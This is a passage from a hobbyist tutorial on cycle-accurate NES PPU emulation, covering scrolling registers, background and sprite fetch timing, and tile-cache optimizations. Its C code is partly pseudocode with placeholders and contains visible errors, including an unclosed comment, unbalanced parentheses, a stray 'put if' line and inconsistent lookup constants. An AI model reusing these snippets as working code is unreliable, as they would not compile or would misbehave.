t:xxABCDEFxxxxxxxx=d:xxABCDEF
t:ABxxxxxxxxxxxxxx=0 (bits 14,15 cleared)
2006 second write:
t:xxxxxxxxABCDEFGH=d:ABCDEFGH
v=t
*/


if (ppu.scroll_latch) //0x2005 and 0x2006 share the same latch
{
ppu.treg6 &= 0xFF;
ppu.treg6 |= ((data & 0x3F) << 8);
}
else
{
ppu.treg6 &= 0x7F00;
ppu.treg6 |= data;
ppu.reg[6] = ppu.treg6;
}
ppu.scroll_latch ^= 1;
}
==========================================================================

===========PPU cycle granularity code=====================================

Now, we move on to the code that shows what the PPU
does along with an explanation in the comments, the code is not optimized
and is cycled based, giving a clear explanation of what it does.
The code was based on nintendulator source code, since it provides
a very detailed going ons of the PPU. Thanks!

/* Notation:
scanline [-1] = the scanline that reads the data for
the next scanline but doesn't render
scanline [0, 239] = scanlines that get drawn to the screen
scanline [240] = the idle scanline.
scanline [241, end_scanline] = end_scanline being 261 for NTSC
or 311 for PAL, this is VBLANK time

pixel_buf is 256*240 bytes of data for the screen resolution

palette_index_buf is the 272 bytes index buffer used to store
the index to access the palette color.

PPU cycles go from 0 to 340 for 341 cycles.

The sprite ppu.sspr_data[] is the 32 bytes array that hold
sprite information that the PPU will use to draw.

ppu.rendering is determined by 0x2001 (background or sprite
rendering on)
and it is less than scanline 240.

All the other should be self explanatory.
*/


void sprite_run()
{
//this gets ran when the PPU is running, thanks to kevtris
//and quietust for figuring this out, one game needed
//accurate sprite rendering since it reads from 0x2004
//during rendering. (Micro Machines)
//spr_state is set to whatever the memory the PPU
//is accessing, we return spr_state in 0x2004 when the PPU
//is rendering to achieve accurate readings.

/* no code will be given here, as I do not think the code
will explain better than this document. Documented
by kevtris and quietust, thanks! */


During all visible scanlines, the PPU scans through OAM to
determine which sprites to render on the next scanline.
During each pixel clock (341 total per scanline), the PPU accesses
OAM in the following pattern:
1. Cycles 0-63: Secondary OAM (32-byte buffer for current sprites on
scanline)
is initialized to $FF - attempting to read $2004 will return $FF
2. Cycles 64-255: Sprite evaluation
* On even cycles, data is read from (primary) OAM
* On odd cycles, data is written to secondary OAM
(unless writes are inhibited, in which case it will read the
value in secondary OAM instead)
* 1. Starting at n = 0, read a sprite's Y-coordinate
(OAM[n][0], copying it to the next open slot in secondary OAM
(unless 8 sprites have been found, in which case the write is
ignored).
* 1a. If Y-coordinate is in range, copy remaining bytes of
sprite data (OAM[n][1] thru OAM[n][3]) into secondary OAM.
* 2. Increment n
* 2a. If n has overflowed back to zero (all 64 sprites evaluated)
go to 4
* 2b. If less than 8 sprites have been found, go to 1
* 2c. If exactly 8 sprites have been found, disable writes to
secondary OAM
* 3. Starting at m = 0, evaluate OAM[n][m] as a Y-coordinate.
* 3a. If the value is in range, set the sprite overflow flag in
$2002 and read the next 3 entries of OAM
(incrementing 'm' after each byte and incrementing
'n' when 'm' overflows);
if m = 3, increment n
* 3b. If the value is not in range, increment n AND m
(without carry). If n overflows to 0, go to 4;
otherwise go to 3
* 4. Attempt (and fail) to copy OAM[n][0] into the next free
slot in secondary OAM,
and increment n (repeat until HBLANK is reached)
3. Cycles 256-319: Sprite fetches (8 sprites total, 8 cycles per sprite)
* 1-4: Read the Y-coordinate, tile number, attributes,
and X-coordinate of the selected sprite
* 5-8: Read the X-coordinate of the selected sprite 4 times.
* On the first empty sprite slot, read the Y-coordinate of
sprite #63 followed by $FF for the remaining 7 cycles
* On all subsequent empty sprite slots, read $FF for all 8 reads
4. Cycles 320-340: Background render pipeline initialization
* Read the first byte in secondary OAM
(the Y-coordinate of the first sprite found,
sprite #63 if no sprites were found)

This pattern was determined by doing carefully timed reads from $2004
using various sets of sprites. In the case where there are 8 sprites on a
scanline, the sprite evaluation logic effectively breaks and starts
evaluating the tile number/attributes/X-coordinates of other sprites as
Y-coordinates, resulting in rather inconsistent sprite overflow behavior
(showing both false positives and false negatives).

From the document, this is the sprite unit and what it reads back,
as for rendering, the sprite rendering begins after the background
rendering, that is at cycle 256, as we can see the sprite unit needs
up to cycle 255 to be finished with getting everything. The rendering is
just like the background with the tile fetching pattern address and such.

A quirk note about the sprite data and how it is gotten,
the first *TWO* sprite in the 256 byte buffer, index starts at
(reg2003 & 0xF8), instead of the normal 0 and 4, though if reg2003
is 0, then it does start at 0 and 4. After the 2 first sprite that
is the index of sprite 0 and sprite 1 is processed, not in the y
range or in, the sprite is processed back to linear order,
that is sprite 2 and 3 and so on is from 8, 12, etc. If the address is
gone over 0xFF, then it wraps back to 0.

}

void ppu_run(int ppu_cycles)
{
for (int i = 0; i != ppu_cycles; ++i)
{
++ppu.cycle;
if (ppu.cycle == 256)
put if (ppu.scanline > -1 )
ppu.end_cycle = 341;
else if (ppu.short_scanline && ppu.rendering)
ppu.end_cycle = 340;
//while blargg's document said it was around 328,
//we just need to keep the sum of the cycles the same.
}
else if (ppu.cycle == 304)
{
//frame start, $2006 gets reloaded with the tmp addr
//this happens in the dummy scanline, and the PPU
//is rendering. The reason for the reload because
//reg[6] is changed as the PPU is rendering.
//reg[6] is the "program counter" for the PPU.

if ((ppu.scanline < 0) && ppu.rendering)
ppu.reg[6] = ppu.treg6;
}
else if (ppu.cycle == ppu.end_cycle)
{
++ppu.scanline;
ppu.cycle = 0;
if (ppu.scanline == 0)
ppu.on_screen = 1;
else if (ppu.scanline == 240) //the idle scanline,
//no rendering or anything
ppu.on_screen = ppu.rendering = 0;
else if (ppu.scanline == 241)
{
/* we are done with filling the frame buffer,
render now */

display->render_frame();
ppu.reg[2] |= 0x80; //vblank
/* It is known that the sprite register address 0x2003
gets changed during rendering, and somehow goes back
to 0 when it is done with a frame, but so far, the
cycle behavior isn't exactly known for how the reg
0x2003 gets changed during rendering, some games rely
on this behavior ppu.reg[3] getting reset to
0 at the end of frame.
*/

ppu.reg[3] = 0; //reset spr addr
cpu.nmi = ppu.reg[0] & 0x80; //set NMI
//with this, we have 20 scanline of vblank for NTSC,
//70 for PAL.
}
else if (ppu.scanline == ppu.end_scanline)
{
ppu.scanline = -1;
ppu.rendering = ppu.reg[1] & 0x18;
if (region == NTSC) //if ntsc first ppu scanline is 340 cyc
ppu.short_scanline ^= 1;
else
ppu.short_scanline = 0;
}
}
else if ((ppu.scanline < 0) && (ppu.cycle == 1))
{
//vblank gets cleared a cycle later, thanks to nintendulator
//for this information.
ppu.reg[2] = 0;
}

/* execute code here if the PPU is rendering
that is the scanline is < 240 and the bg or spr
is set to render in 0x2001 */

if (ppu.rendering)
{
ppu_sprite_run(); //put it in a separate function for clearer
//explanation
switch (ppu.cycle)
{
//everything in here is related to the bg layer
//the NES PPU has 2 layers, the BG and the SPRITE.

/* This runs 34 times, (tiles, attribute tables, etc.)
because there are 32 tiles
to a scanline (256 horizontal pixels) and then
2 more tiles at the end for the next scanline
since the PPU renders on *every* cycle
(cycle 0 to 255). every tile is processed
in 8 cycles before it restarts, showing
the increments of 8 below, basically the steps
are as follows, it takes 2 cycles to read a data
that means 2 cycles for tiles, 2 cycles for attributes,
2 cycles for lo chr and then 2 cycles for high,
making it a total of 8 cycles for each tile
decompressed. */


case 0: case 8: case 16: case 24:
case 32: case 40: case 48: case 56:
case 64: case 72: case 80: case 88:
case 96: case 104: case 112: case 120:
case 128: case 136: case 144: case 152:
case 160: case 168: case 176: case 184:
case 192: case 200: case 208: case 216:
case 224: case 232: case 240: case 248:
case 320: case 328:
/*
This is why treg6 was shifted to the left 10
this acts the upper 10th and 11th bit,
deciding the name table ppu.reg[6] will
read from. (PPU should be allowed to wait
at least one frame until you render
Regs write to treg6 so it can get reloaded
as we will see later reg[6] gets incremented
during rendering. */


/* This is for the bg rendering
get the tile address, all it does
is get the name table address written
in the lower 2 bits of 0x2000, then it
gets then it gets the lower 0x3FF bytes
where the tiles are stored, since
the tiles are 32x30, it can use up to 960 (32*30)
bytes, but why do we AND by 0x3FF? This is because
the tile can be fetched from the attribute tables
if the address of reg[6] (loopy_v is in that
range */


//p_nt is a 4 pointer to array index to deal with
//mirroring

//get the tile, the tile is written to by the
//programmer to the name table, (0x2000 to 0x2FFF)
//this tells the PPU where to get the pattern table
//later from.

tile = ppu.p_nt[(ppu.reg[6] & 0xC00) >> 10]
[ppu.reg[6] & 0x3FF];
break;

case 1: case 9: case 17: case 25:
case 33: case 41: case 49: case 57:
case 65: case 73: case 81: case 89:
case 97: case 105: case 113: case 121:
case 129: case 137: case 145: case 153:
case 161: case 169: case 177: case 185:
case 193: case 201: case 209: case 217:
case 225: case 233: case 241: case 249:
case 321: case 329:
//this gets the pattern address
//using the tile we got a cycle earlier.
pat_addr = (tile << 4) | (ppu.reg[6] >> 12) |
ppu.bg_addr;
break;

/* As documented above, we know that each tile is
8x8 pixels, thus we shift (tile << 4) by skipping
16 bytes of data, since the lower 2 bits of the
index that accesses the palette is stored in 2
different bytes 8 bytes away from each other,
making each tile taking up 16 bytes each of 8 bits,
for 8x8 pixels. The ppu.reg[6] >> 12 is known
as the fine y, every scanline the ppu.reg[6]
is incremented in the upper 12-14 bit, which goes
from 0-7, this tells which scanline the PPU is on
so it knows where to look, every value correspond
to every next byte such so let us say bg_addr
is one, and the tile is 0, then the value
it takes is 0 to 7, which is pattern_table[0, 7].
As you can see here each byte in 16 byte format
is going vertically down.

Example: pattern_table[0] and pattern_table[8]
contains the pixels for the first 8 pixels.
pattern_table[1] and pattern_table[9] contains
the first 8 pixels for the NEXT scanline, and
so forth. The ppu.bg_addr in this case is the value
we set in reg 0x2000, either 0 or 0x1000.
this pat_addr tells the PPU where to get the
pattern table data from.

*/


                case   2:    case  10:    case  18:    case  26:     
case 34: case 42: case 50: case 58:
case 66: case 74: case 82: case 90:
case 98: case 106: case 114: case 122:
case 130: case 138: case 146: case 154:
case 162: case 170: case 178: case 186:
case 194: case 202: case 210: case 218:
case 226: case 234: case 242: case 250:
/* gets the attribute address, also get the attribute
shift, since attribute_addr only gets the address
of the attribute byte,
and not which location of the 2 bits we want.
So we get it using */


//attribute_shift which tells us how much we
//need to right shift by to get it later.
attribute_addr = ppu.render_addr = 0x23C0 |
(ppu.reg[6] & 0xC00) |
(attr_loc[ppu.reg[6] & 0x3FF]);
attrib_shift = attr_shift[ppu.reg[6] & 0x3FF];
break;

/* This gets the attribute address, which is the 64
bytes at the end of the name table, so the
(0x23C0 | ppu.reg[6] & 0xC00) figures out which
name table we are using, from ppu.reg[6]
and then and it is looked up in a table for speed.
The code to fill the attr_loc[] table and
attr_shift_table[]
is
unsigned char attr_shift_table[0x400];
unsigned char attr_loc[0x400];
for (int i = 0; i != 0x400; ++i)
{
attr_shift_table[i] = ((i >> 4) & 0x04)
| (i & 0x02);
attr_loc[i] = ((i >> 4) & 0x38) | ((i >> 2))
& 7;
}
*/


case 3: case 11: case 19: case 27:
case 35: case 43: case 51: case 59:
case 67: case 75: case 83: case 91:
case 99: case 107: case 115: case 123:
case 131: case 139: case 147: case 155:
case 163: case 171: case 179: case 187:
case 195: case 203: case 211: case 219:
case 227: case 235: case 243:
//this time we apply the attribute byte to the
//pixel buffer

render_addr = attribute_addr; //to make it more clear

attribute = ((ppu.p_nt[(render_addr & 0xC00) >> 10]
[render_addr & 0x3FF] >> attribute_shift) & 3)
<< 2;

for (k = 0; k != 8; ++k)
palette_index_buf[ppu.cycle+13+k] = attribute;

if ((ppu.reg[6] & 0x1F) == 0x1F)
ppu.reg[6] ^= 0x41F;
else
++ppu.reg[6];

break;

/* 1 attribute byte covers 8 tiles, but we are
doing one tile at a time, so we get
the 2 upper bits, and then copying the
attribute pixel_buf to 8 pixels places
since a tile is 8 pixels each. We add indedx+13
because we are starting from 16 (3 + 13),
because the last 2 tile fetches happen at the
end of a previous scanline fill the first 16 pixels
of the current scanline so it can render, as the
PPU renders a pixel per cycle.
We increment the ppu.reg[6] because it is finished
fetching the tile and the attribute, the increment
acts as "fine x", allowing the next tile to be get
on the next address,
(tile = ppu.p_nt[(ppu.reg[6] & 0xC00) >> 10]
[ppu.reg[6] & 0x3FF])
When it hits 31, that is when it is done drawing
a scanline, since 8 * 32 = 256 pixels, it flips
0x41FF to reset the position back to 0, as
0x41FF is 0b10000011111, so it resets the 5
lower bits to reset the fine x to, the upper bit
is used for mirroring. If we recall,

2000 write:
t:xxxxABxxxxxxxxxx=d:xxxxxxAB
t is treg6 in this case
(0 = $2000; 1 = $2400; 2 = $2800; 3 = $2C00)
If you recall the type of name table mirroring
the NES has, you will find why this works,
for horizontal mirroring 0x2000 and 0x2400
and 0x2800 and 0x2C00 points to the same data,
if you write 0x2000 or 0x2400 then the "B"
value will get set or not set, but when it
gets flipped, horizontal mirroring ensures
you still get the same data, as for 0x2800
and 0x2c00, this still works because 2 is 10b
and 3 is 11b, so it will switch back and forth
to locations that share the same data.
As for vertical mirroring this works because
0x2400 is equal to 0x2c00, so when it flips
you get the vertical mirroring you expected,
the same logic applies for the other 3 addresses.
Single screen mirroring need not to worry about
this, since it all shares the same data, as for 4
separate name tables, it is assumed that the
programmer know what they are doing and thus made
the code fool proof to display the correct thing
when it switches.
*/


case 323: case 331:
//this time we apply the attribute byte to the
//pixel buffer

render_addr = attribute_addr;

attribute = ((ppu.p_nt[(render_addr & 0xC00) >> 10]
[render_addr & 0x3FF] >>
attribute_shift) & 3) << 2;

for (k = 0; k != 8; ++k)
palette_index_buf[ppu.cycle-323+k] = attribute;

if ((ppu.reg[6] & 0x1F) == 0x1F)
ppu.reg[6] ^= 0x41F;
else
++ppu.reg[6];

break;
/* this is the last 2 attribute fetches for the next
scanline, since the PPU render a pixel
every cycle */


case 4: case 12: case 20: case 28:
case 36: case 44: case 52: case 60:
case 68: case 76: case 84: case 92:
case 100: case 108: case 116: case 124:
case 132: case 140: case 148: case 156:
case 164: case 172: case 180: case 188:
case 196: case 204: case 212: case 220:
case 228: case 236: case 244: case 252:
case 324: case 332:
render_addr = pat_addr;
/*
this part is hardware based, the software part we
already got
pat_addr in cycle base, i guess there is some delay
in the hardware before it starts reading it.
Reading/Writing takes 2 cycles each.
*/


case 5: case 13: case 21: case 29:
case 37: case 45: case 53: case 61:
case 69: case 77: case 85: case 93:
case 101: case 109: case 117: case 125:
case 133: case 141: case 149: case 157:
case 165: case 173: case 181: case 189:
case 197: case 205: case 213: case 221:
case 229: case 237: case 245: case 253:
for (k = 0; k != 8; ++k)
palette_index_buf[ppu.cycle+11+k] |=
( ((pattern_table[addr] >> (k ^ 7)) & 1);
break;

case 325: case 333:
for (k = 0; k != 8; ++k)
palette_index_buf[ppu.cycle-325+k] |=
( ((pattern_table[addr] >> (k ^ 7)) & 1)
break;
/* The same thing applies to these 2 cycles, but we
subtract 325, because this is the last 2 tiles
fetches I was talking about,
they are for the next scanline to use */


/* We get the first lower bit from the pattern table
address and OR it with the upper 2 bits from the
address table */


case 6: case 14: case 22: case 30:
case 38: case 46: case 54: case 62:
case 70: case 78: case 86: case 94:
case 102: case 110: case 118: case 126:
case 134: case 142: case 150: case 158:
case 166: case 174: case 182: case 190:
case 198: case 206: case 214: case 222:
case 230: case 238: case 246: case 254:
case 326: case 334:
render_addr = pat_addr | 8;
break;
/* This is for the other upper bit in the pattern
table, it is 8 bytes apart from the 1st bit,
so we OR it by 8 here. */


case 7: case 15: case 23: case 31:
case 39: case 47: case 55: case 63:
case 71: case 79: case 87: case 95:
case 103: case 111: case 119: case 127:
case 135: case 143: case 151: case 159:
case 167: case 175: case 183: case 191:
case 199: case 207: case 215: case 223:
case 231: case 239: case 247: case 255:
for (k = 0; k != 8; ++k)
palette_index_buf[ppu.cycle+9+k] |=
(((pattern_table[addr | 8] << 1)
>> (k ^ 7)) & 2) );
break;
/* This is the upper bit of the 2 bit plane that is
in the pattern table. Now we have our index
to access the palette */


case 327: case 335:
for (k = 0; k != 8; ++k)
palette_index_buf[ppu.cycle-327+k] |=
(((pattern_table[addr | 8] << 1)
>> (k ^ 7)) & 2) );
break;
//The upper bit of the 2 bit plane that is in
//the pattern table for the last 2 tiles.

case 251:
render_addr = attribute_addr;

attribute = ((ppu.p_nt[(render_addr & 0xC00) >> 10]
[render_addr & 0x3FF]
>> attribute_shift) & 3) << 2;

for (k = 0; k != 8; ++k)
palette_index_buf[ppu.cycle+13+k] = attribute;

if ((ppu.reg[6] & 0x1F) == 0x1F)
ppu.reg[6] ^= 0x41F;
else
++ppu.reg[6];

/* This is the same as above when applying the
attribute data */


if ((ppu.reg[6] & 0x7000) == 0x7000)
{
tmp = ppu.reg[6] & 0x3E0;
//reset tile y offset 12 - 14 in addr
ppu.reg[6] &= 0xFFF;
switch (tmp)
{
//29, flip bit 11
case 0x3A0:
ppu.reg[6] ^= 0xBA0;
break;
case 0x3E0: //31, back to 0
ppu.reg[6] ^= 0x3E0;
break;
default: //inc y scroll if not reached
ppu.reg[6] += 0x20;
}
}
else //inc fine y
ppu.reg[6] += 0x1000;
break;

/* This is when the PPU reset the fine y with
ppu.reg[6] &= 0xFFF;
if it reaches 7 to index pattern table
properly again.
(Remember, pattern table is indexed with
ppu.reg[6] >> 12 so this clears the top bits
which is fine y.) else, it increments fine y
for the data to be get again for the pattern
table to access. As for the switch case,
bits 5 to 9 represents the y scroll value,
and it gets incremented
for every 8 fine y we do. It wraps back to 0
and then it flips
bit 11 when it hits 29, (for horizontal
mirroring it uses the
other name table, for vertical mirroring,
this doesn't affect it)
because the NES height is 240, so 8*30 = 240,
it fits the height, it is 29 because we count 0
as 1. There is a quirk however,
that is if you write to PPU scrolling regs to
modify the address then it goes back to 0,
and bit 11 does not get flipped, else
it gets incremented by 32, because the y
scroll is at bit 5 to 9, and not 0 to 4.
*/

/* This is the sprite's turn to grab the data,
since the PPU
can do up to 8 sprites (32 bytes memory)
it takes 8*8=64 cycles
to do it. The grab is just like background,
it goes from 256 to cycle 319 */


/* NOTE: these render_addr equals to was gotten
from nintendulator information, since
quietust and kevtris did a cycle by cycle reading
of the PPU to figure out what exactly happens,
I am not certain if this is what the PPU
is actually reading back during these cycles.

case 256: case 264: case 272: case 280:
case 288: case 296: case 304: case 312:
render_addr = 0x2000 | (ppu.reg[6] & 0xFFF);
/* this is supposed to get the name table address
for the title, but, the tile is stored in the 32
byte buffer, so we'll just leave the render_addr
like this, since the memory map of that 32 byte
is not accessible from a regular memory read,
instead 0x2004 is the one that reads back
what the sprite rendering is doing. */

break;

case 257:
ppu.reg[6] &= 0xFBE0;
ppu.reg[6] |= (ppu.treg6 & 0x41F);
render_addr = 0x2000 | (ppu.reg[6] & 0xFFF);
/* this resets every x bits and the name table bits,
and then reads back from the temporary reg written
in $2005. This gives the new scanline
a fresh start with the fine x*/


case 258: case 266: case 274: case 282:
case 290: case 298: case 306: case 314:
render_addr = 0x2000 | (ppu.reg[6] & 0xFFF);
/* supposed to get attribute table, but we don't
do it here because
we got it in the 32 byte buffer.

case 265: case 273: case 281: case 289:
case 297: case 305: case 313:
//get pattern table here, but we don't do
//that either, because
//its done during the fill

case 259: case 267: case 275: case 283:
case 291: case 299: case 307: case 315:
pat_addr = sprite_pat_addr;
//figure out the pattern address here
break;
case 260: case 268: case 276: case 284:
case 292: case 300: case 308: case 316:
render_addr = pat_addr;
break;
//copy pat_addr to render addr we have
case 261: case 269: case 277: case 285:
case 293: case 301: case 309: case 317:
//copy attribute code here, and then apply
//low chr.
for (k = 0; k != 8; ++k)
{
spr_pixel_index_buf[ppu.cycle-261+k] =
attribute code here;
spr_pixel_index_buf[ppu.cycle-261+k] |=
low chr here.
}
/* spr_pixel_index_buf is a 64 byte buf,
since it is 8 tiles. (64 pixels) */

case 262: case 270: case 278: case 286:
case 294: case 302: case 310: case 318:
render_addr = pat_addr | 8;
break;
//get the hi chr now...

case 263: case 271: case 279: case 287:
case 295: case 303: case 311: case 319:
for (k = 0; k != 8; ++k)
spr_pixel_index_buf[ppu.cycle-261+k] |=
hi chr here.
break;
case 336: case 338:
render_addr = 0x2000 | (ppu.reg[6] & 0xFFF);
break;
case 337: case 339:
break;
case 340:
break;
/* Now one line of scanline has been complete,
341 cycles [0, 340] has been done.
Another note, the render_addr = ...
is not certain that the real NES
reads like this, but it does adhere
to the 2 cycles per fetch basis, also
no games does sprites to this accurate fetching,
one can just speed up the sprite code by writing
all the sprite data at once at cycle 319, since
we already have all the data by cycle 255.
*/

}
//The PPU render a pixel every cycle, this is ran
//when the PPU is on_screen and less than cycle 256
//(stil rendering that 256 horizontal pixels)
if (ppu.on_screen && (ppu.cycle < 256))
{
/* this checks if the background is visible, or the cycle
is greater than 8, or background cliping is off reg
0x2001 can configure if the 8 pixels on the left of the
screen can be displayed or not. */


/* Now we know enough to explain inc_x. Since 0x2005
affects scrolling, and the NES gets a tile a 16
byte chunks covering 8x8 pixels,
there isn't a way to say I want to scroll starting
from bit 6 (2nd pixel) on the first tile,
so this is where inc_x comes in, it allows pixel
granularity for scrolling, of width 8, because a
byte is 8 pixels in the NES
case.
*/

if (ppu.bg_v && ((ppu.cycle >= 8) || ppu.bg_clip))
index = ppu.palette_index_buf[ppu.cycle + ppu.inc_x];
//covering the inc_x too
else
index = 0; //if not, use master palette color.
/* this code checks if the sprite is visible and no
sprite clipping */


if (ppu.spr_v && ((ppu.cycle >= 8) || ppu.spr_clip))
{
/* goes through the sprite (8 of them in total)
to find the first sprite inline with the
x coordinate as it is rendering */

for (k = 0; k < sprcount; k += 4)
{
tmp = k >> 1;
//sprite's x pos
j = ppu.cycle - ppu.sspr_data[0x20 | tmp];
if (j & ~7) //not in range, keep going
continue;
j = ppu.spr_buf[(k << 1) | j];
if (j) //the sprite is in range, figure out to
//draw it or not.
{
/* If sprite 0 is in the scanline,
figured out in sprite_run() and the
background is visible and it the sprite
found in range for the x position render is
sprite 0, and the cycle is less than 255
(meaning sprite hit won't happen if the
NES rendering the 256th pixel, and
the index that is the bg is not
transparent, (using the master palette
color, we set a flag ppu.reg[2] |= 0x40.
this is known as the sprite hit flag, and
basically it is used for timing purposes
to achieve scrolling effects. */


if (ppu.spr0inline && !k &&
ppu.bg_v && (ppu.cycle < 255) &&
index)
{
ppu.reg[2] |= 0x40;
ppu.spr0inline = 0;
}
//if the sprite priority is greater than the bg
//set in the sprite ram, we replace the index
//with the sprite data instead of the bg,
//we |= 0x10 because the sprite palette
//address is
//greater than the bg

//do if sprite priority is greater than bg
if (!(index && ppu.sspr_data[0x20 |
(tmp | 1)]))
index = j | 0x10;
//OR by 0x10 since sprite palette is in
//second row

//found first opaque sprite break out
//since lower priority is displayed in
//front of higher priority
break;
}
}
}
//if ppu is off, render from palette
//0 or if $2006 is in 0x3FXX range
//use that color
if (!ppu.rendering)
{
if ((ppu.reg[6] & 0x3F00) == 0x3F00)
index = ppu.reg[6] & 0x1F;
}
index &= ppu.grayscale; //deal with grayscale
//set in 0x2001
index |= ppu.color_emphasis; //color emphasis
//set in 0x2001.
*ppu.p_pixel = ppu.p_palette[ppu.palette[index]];
//copy to the pixel buf
++ppu.p_pixel;
}
}
}

To sum it up, here is the shorten scanline rendering information.

Scanline -1:
We use the number -1 because this is an active scanline that
fetches everything normally, for the 2 tiles at the end, what
we don't want is the sprite to be in range for this scanline, thus,
it is called scanline -1.

Scanline to 0 239:
The PPU renders 256x240 pixels here, as normal.

Scanline 240:
This is an idle scanline, the PPU seem not to be doing anything here.

Scanline 241 to 260 for NTSC, 310 for PAL:
This is VBLANK time, a time when the electron gun repositions itself at
the top, the PPU will make no memory accesses or change the address for
0x2006, thus the programmer can write to the PPU safely here.

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

++++++++++++++Code Optimizations for the PPU++++++++++++++++++++++++++++++

Now that we know what the PPU does cycle by cycle, we can obviously
take a few shortcuts, first and foremost, the main speed hindrance is the
sprite_run() code. To write this code, means you need to write a state
machine, one with many conditionals, when I first started writing this
using conditionals, I think the speed hit was 20 to 30 fps.
If you want this kind of accuracy, what you can do is inline the sprite
fetches inside the cycle cases, and to change states, you can use function
pointers to implement "state changes". There is still speed losses however,
since *most* games do not rely on cycle accurate sprite behavior, you can
get away with doing little sprite logic, and just figuring out all the data
at the end of the background rendering, at cycle 256, in a loop,
with no state machine needed.
The state machine is just there to emulate the hardware. For the games
that do rely on 0x2004 readings (Micro Machines) that need accurate
cycle behavior, what you can do is write the 0x2004 code so that when
its read, and the PPU is rendering, it runs from *START* to the the
current cycle we are on, this is not a problem because games
rarely read from 0x2004 during rendering. Another way is to
take advantage of the deterministic behavior by taken over the
reg 0x2003/0x2004/0x4014 writes to predict what will be returned.
I recommend the catch up method, it is the easiest one to impelement,
and it is not too slow, the deterministic method needs alot of
accurate timing and figuring out.

======Optimized cycle by cycle PPU run state machine======================
switch (ppu.cycle)
{
case 0: 1: 2: //so on...
spr_buff[ppu.cycle>>1] = 0xFF; //we init it to 0xFF at the
//beginning
case 64:
//reset all the sprite variables needed to work out the sprite.
spr_count = 0; //how many sprite are in this scanline....
//so on
sprite_fp_run = sprite_y_logic;
sprite_fp_run(); start the state machine...
case 65:
}
void sprite_y_logic()
{
if (sprite_is_in_scanline)
sprite_fp_run = sprite_fetch;
}
void sprite_fetch()
{
//fetch sprite here
}
==========================================================================

==============Catch up method=============================================

u8 rd_reg2004()
{
sprite_run(up_to_the_cycle_we_are_on_from_start_cycle)
return data;
/* we can optimize this further by keeping a variable
that tells what cycle we just finished at so if
0x2004 is read again before the scanline ends, we don't have
to do it at the beginning again. We need to reset
this variable on every new scanline though */

}

==========================================================================

=============Deterministic method=========================================
void wr_reg2003()
{
//figure out where the first 2 sprite is read, etc.
}
void wr_reg2004()
{
//figure out what sprites are written to, the information etc.
//and save it to a buffer.
}
void wr_reg4014()
{
//same thing as reg2004, but we need to figure out on a 256 byte
//data basis, rather
//than 1 like reg2004.
}

We can also predict the timing of sprite overflow and sprite hit due to
their deterministic behavior, those should work the same way.

=========Tile Caches======================================================

We can speed up the copying of data process by storing the tiles in a
manner that is native to our program, here is one way to do it, thanks to
Disch for this method.

void build_chr_cache(u8 *src, u8 *dst, size_t len)
{
//using the trick by disch, thanks!
//trick is to
//make it these values so don't have to
//use comparison and OR to get attribute
//can just AND it
const u8 chr[] = { 0x00, 0xFD, 0xFE, 0xFF };
u8 p;
size_t i, k, j, c;
for (c = i = 0; i < len; i += 16)
{
for (j = 0; j != 8; ++j)
{
for (k = 0; k != 8; ++k)
{
p = (src[j] >> (7^k)) & 1;
p |= ((src[j|8] << 1) >> (7^k) & 2);
dst[c++] = chr[p];
}
}
src += 16;
}
}
the idea store the CHR-ROM on start up into a memory space where
the bytes has already been ORed for you. So during run time, you don't
need to do it. This works well for CHR-ROM because the pattern table
doesn't change, for CHR-RAM we could also use this method, because
changes to the rendering don't happen nearly as often as the time
spent rendering.

void update_chr_cache(int addr, u8 data)
{
static const u8 chr[] = { 0x00, 0xFD, 0xFE, 0xFF };
int j, t;
//if hi chr address
//make it low chr address
j = (addr & 8) >> 3;
addr = pat_addr_lut[addr];
/* addr = ((addr << 3) & 56) |
((addr & 0xFFF0) << 2); */

t = 2 - j;
cpt[addr] = chr[(cpt[addr] & t) | ((data >> 7 << j) & (j+1))];
cpt[addr | 1] = chr[(cpt[addr | 1] & t) | ((data >> 6 << j) & (j+1))];
cpt[addr | 2] = chr[(cpt[addr | 2] & t) | ((data >> 5 << j) & (j+1))];
cpt[addr | 3] = chr[(cpt[addr | 3] & t) | ((data >> 4 << j) & (j+1))];
cpt[addr | 4] = chr[(cpt[addr | 4] & t) | ((data >> 3 << j) & (j+1))];
cpt[addr | 5] = chr[(cpt[addr | 5] & t) | ((data >> 2 << j) & (j+1))];
cpt[addr | 6] = chr[(cpt[addr | 6] & t) | ((data >> 1 << j) & (j+1))];
cpt[addr | 7] = chr[(cpt[addr | 7] & t) | ((data << j) & (j+1))];

//with CHR-RAM, you can call this function whenever 0x2007 is used
//to write to the pattern table.
}

With the data stored this way, whenever we use the attributes,
we can just AND instead of doing something like
if (index) apply_attribute();

(Remember, the lower 2 bits determine if the bg is to be using a color
at all, attribute gets applied only if the index from the 2 bit
in the pattern table isnt 0)
With this method, we can just index & attribute since we fill the
decoded pattern table into the tile cache as 0x00 as 2 lower bit 0b,
0xFD with 01b, 0xFE 10b, 0xFF 11b, we can just AND out all the upper
bits by doing it this method. There are many other techniques for tiling,
play around with it a little. If you don't mind a little portability loss
and some extra code for endian checking, you can access the tile cache
buffer using a short pointer (16 bit), long pointer (32 bit machine) or
long long pointer (64 bit) to copy the data from the tile buffer to
the pixel buffer, so we don't copy byte by byte. Applying the attribute
table can also be done that way with a lookup table, we take advantage
of how the attribute is the same for 16 pixels, we can make a lookup table
that copy native word size, 4 bytes at a time. Here is an example for 32
bit.

static const unsigned long attr_lut[] =
{
0x30303003, 0x70707007, 0xB0B0B0B, 0xF0F0F0F,
};
We AND this table with the tile buffer to get our index for 4 pixels
at a time. Obviously we can adjust it to any other native word size.

Another method I found cool is blargg's method.
Thanks to blargg for writing about this, his words are below:

In my emulator I render graphics to an offscreen graphics
buffer with 8 bits per pixel. I use palette entries 32-63 for
the 32 NES palette entries, leaving room for the host system at
the beginning of the palette. The cached CHR data is just a reordering
of the original data to allow shifting and masking to quickly generate
the 8-bit-per-pixel format. This keeps the cached data to a minimum size,
lessening impact on the host's processor cache.
There is also a separate cache with pixels horizontally flipped.

Each cached tile consists of four pairs of lines,
and each pair is stored in a 4-byte integer. The 2-bit pixels
for the two lines are reordered in the cache to allow for quick extraction:

Code:

12345678 CHR pixels (2 bits per pixel)
ABCDEFGH

A1E5B2F6C3G7D4H8 Cache (4 bytes)
-1---2---3---4-- Masked pixels
---5---6---7---8
A---B---C---D---
--E---F---G---H-

uint32_t* pixels = ... // pixel buffer to draw into
uint32_t mask = 0x03030303; // mask to extract pixels
int attrib = 2; // attribute bits (0-3)
uint32_t offset = (8 + attrib) * 0x04040404; // distribute to 4 pixels

